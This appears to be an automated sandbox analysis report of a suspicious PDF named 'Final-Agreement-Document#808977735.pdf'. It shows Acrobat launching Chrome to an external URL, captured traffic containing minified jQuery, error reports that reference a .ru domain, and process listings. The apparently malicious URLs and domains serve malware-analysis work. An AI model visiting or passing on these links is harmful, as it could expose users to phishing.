                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                  2025-01-15 02:00:50 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.45675135.190.80.14438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:51 UTC543OUTOPTIONS /report/v4?s=zoE%2FDfIvSR3Nd1r1CiqMQFvJARc%2BYHi2NWPgdlrwkCaWYVVL8OLZGxrymBbzJN%2BD12%2BqkyBUKsk7j2BJZFuQHlrvu2nNljMZPgFBpuU%2FC37RHTfuNZMRIbAEdIgebA%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Origin: https://qelira.qelirathor.ru
                                                                                  Access-Control-Request-Method: POST
                                                                                  Access-Control-Request-Headers: content-type
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:51 UTC336INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  access-control-max-age: 86400
                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                  access-control-allow-origin: *
                                                                                  access-control-allow-headers: content-type, content-length
                                                                                  date: Wed, 15 Jan 2025 02:00:50 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.45675235.190.80.14438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:51 UTC480OUTPOST /report/v4?s=zoE%2FDfIvSR3Nd1r1CiqMQFvJARc%2BYHi2NWPgdlrwkCaWYVVL8OLZGxrymBbzJN%2BD12%2BqkyBUKsk7j2BJZFuQHlrvu2nNljMZPgFBpuU%2FC37RHTfuNZMRIbAEdIgebA%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 438
                                                                                  Content-Type: application/reports+json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:51 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 39 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 6c 69 72 61 2e 71 65 6c 69 72 61 74 68 6f 72 2e 72 75 2f 31 65 36 36 71 68 58 39 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65
                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":591,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://qelira.qelirathor.ru/1e66qhX9/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-e
                                                                                  2025-01-15 02:00:51 UTC168INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  date: Wed, 15 Jan 2025 02:00:51 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:20:57:59
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Final-Agreement-Document#808977735.pdf"
                                                                                  Imagebase:0x7ff6bc1b0000
                                                                                  File size:5'641'176 bytes
                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:20:58:00
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                  Imagebase:0x7ff74bb60000
                                                                                  File size:3'581'912 bytes
                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:20:58:00
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,180817469921012578,6083720237724909725,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                  Imagebase:0x7ff74bb60000
                                                                                  File size:3'581'912 bytes
                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:20:58:24
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://aifunygg.planaltinashopping.com.br/"
                                                                                  Imagebase:0x7ff76e190000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:20:58:25
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15896860205605007206,14525201702814170272,262144 /prefetch:8
                                                                                  Imagebase:0x7ff76e190000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  No disassembly